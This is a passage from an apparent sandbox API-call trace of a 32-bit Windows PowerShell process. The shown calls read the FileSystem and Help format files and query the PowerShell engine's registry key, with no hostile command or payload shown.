(normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f6ff4c | out: lpFileInformation=0x2f6ff4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0152.051] GetLastError () returned 0x0 [0152.051] SetErrorMode (uMode=0x1) returned 0x1 [0152.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0152.051] GetLastError () returned 0x0 [0152.051] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e6a8 | out: phkResult=0x12e6a8*=0x350) returned 0x0 [0152.051] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x0, lpcbData=0x12e6ec*=0x0 | out: lpType=0x12e6f0*=0x1, lpData=0x0, lpcbData=0x12e6ec*=0x56) returned 0x0 [0152.051] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x509ca8, lpcbData=0x12e6ec*=0x56 | out: lpType=0x12e6f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12e6ec*=0x56) returned 0x0 [0152.051] RegCloseKey (hKey=0x350) returned 0x0 [0152.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0152.052] GetLastError () returned 0x0 [0152.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e1e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0152.052] GetLastError () returned 0x0 [0152.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.052] GetLastError () returned 0x0 [0152.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.052] GetLastError () returned 0x0 [0152.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.052] GetLastError () returned 0x0 [0152.053] VirtualQuery (in: lpAddress=0x12d400, lpBuffer=0x12e400, dwLength=0x1c | out: lpBuffer=0x12e400*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.053] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xcae24a0e, Data2=0xcb23, Data3=0x43ba, Data4=([0]=0xa1, [1]=0xd1, [2]=0x9f, [3]=0xc6, [4]=0x4d, [5]=0xd, [6]=0x74, [7]=0xed))) returned 0x0 [0152.053] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.054] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x36c00dbe, Data2=0xd02, Data3=0x44db, Data4=([0]=0x93, [1]=0x96, [2]=0x6e, [3]=0xcb, [4]=0xc1, [5]=0x9f, [6]=0x9b, [7]=0x23))) returned 0x0 [0152.054] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x428fe6e3, Data2=0x6f5, Data3=0x4ccd, Data4=([0]=0x84, [1]=0xa9, [2]=0x85, [3]=0x56, [4]=0xab, [5]=0xbc, [6]=0x99, [7]=0x72))) returned 0x0 [0152.054] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xac83b255, Data2=0x88fc, Data3=0x42bb, Data4=([0]=0xad, [1]=0x1b, [2]=0xd1, [3]=0x73, [4]=0xc0, [5]=0x2d, [6]=0xc8, [7]=0x81))) returned 0x0 [0152.054] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.054] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e1bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0152.054] GetLastError () returned 0x0 [0152.054] SetErrorMode (uMode=0x1) returned 0x1 [0152.054] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0152.055] GetLastError () returned 0x0 [0152.055] GetFileType (hFile=0x350) returned 0x1 [0152.055] SetErrorMode (uMode=0x1) returned 0x1 [0152.055] GetFileType (hFile=0x350) returned 0x1 [0152.055] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.055] GetLastError () returned 0x0 [0152.055] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.055] GetLastError () returned 0x0 [0152.055] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.055] GetLastError () returned 0x0 [0152.055] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.055] GetLastError () returned 0x0 [0152.055] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.055] GetLastError () returned 0x0 [0152.056] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.056] GetLastError () returned 0x0 [0152.056] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.056] GetLastError () returned 0x0 [0152.056] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.056] GetLastError () returned 0x0 [0152.057] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.057] GetLastError () returned 0x0 [0152.057] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.057] GetLastError () returned 0x0 [0152.057] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.057] GetLastError () returned 0x0 [0152.058] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.058] GetLastError () returned 0x0 [0152.058] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.058] GetLastError () returned 0x0 [0152.058] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.058] GetLastError () returned 0x0 [0152.058] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.058] GetLastError () returned 0x0 [0152.058] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.058] GetLastError () returned 0x0 [0152.060] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.060] GetLastError () returned 0x0 [0152.060] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.061] GetLastError () returned 0x0 [0152.061] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.061] GetLastError () returned 0x0 [0152.061] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.061] GetLastError () returned 0x0 [0152.061] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.061] GetLastError () returned 0x0 [0152.061] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.061] GetLastError () returned 0x0 [0152.061] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.062] GetLastError () returned 0x0 [0152.062] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.062] GetLastError () returned 0x0 [0152.062] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.062] GetLastError () returned 0x0 [0152.062] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.062] GetLastError () returned 0x0 [0152.062] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.062] GetLastError () returned 0x0 [0152.062] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.063] GetLastError () returned 0x0 [0152.063] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.063] GetLastError () returned 0x0 [0152.063] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.063] GetLastError () returned 0x0 [0152.063] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.063] GetLastError () returned 0x0 [0152.063] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.063] GetLastError () returned 0x0 [0152.067] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.067] GetLastError () returned 0x0 [0152.067] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.067] GetLastError () returned 0x0 [0152.067] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.067] GetLastError () returned 0x0 [0152.068] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.068] GetLastError () returned 0x0 [0152.068] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.068] GetLastError () returned 0x0 [0152.068] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.068] GetLastError () returned 0x0 [0152.068] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.068] GetLastError () returned 0x0 [0152.068] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.068] GetLastError () returned 0x0 [0152.069] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.069] GetLastError () returned 0x0 [0152.069] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.069] GetLastError () returned 0x0 [0152.069] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.069] GetLastError () returned 0x0 [0152.069] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.069] GetLastError () returned 0x0 [0152.069] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.069] GetLastError () returned 0x0 [0152.070] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.070] GetLastError () returned 0x0 [0152.070] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.070] GetLastError () returned 0x0 [0152.070] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.070] GetLastError () returned 0x0 [0152.070] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.070] GetLastError () returned 0x0 [0152.070] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.070] GetLastError () returned 0x0 [0152.071] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.071] GetLastError () returned 0x0 [0152.071] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.071] GetLastError () returned 0x0 [0152.071] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.071] GetLastError () returned 0x0 [0152.071] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.071] GetLastError () returned 0x0 [0152.071] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.071] GetLastError () returned 0x0 [0152.072] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.072] GetLastError () returned 0x0 [0152.072] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.072] GetLastError () returned 0x0 [0152.072] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.072] GetLastError () returned 0x0 [0152.072] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.072] GetLastError () returned 0x0 [0152.072] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.072] GetLastError () returned 0x0 [0152.073] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.073] GetLastError () returned 0x0 [0152.073] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.073] GetLastError () returned 0x0 [0152.073] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0xf37, lpOverlapped=0x0) returned 1 [0152.073] GetLastError () returned 0x0 [0152.073] ReadFile (in: hFile=0x350, lpBuffer=0x2f9864b, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f9864b*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0152.073] GetLastError () returned 0x0 [0152.073] ReadFile (in: hFile=0x350, lpBuffer=0x2f98f74, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f98f74*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0152.073] GetLastError () returned 0x0 [0152.073] CloseHandle (hObject=0x350) returned 1 [0152.074] GetLastError () returned 0x0 [0152.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e284, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0152.074] GetLastError () returned 0x0 [0152.074] SetErrorMode (uMode=0x1) returned 0x1 [0152.074] GetFileAttributesExW (in: 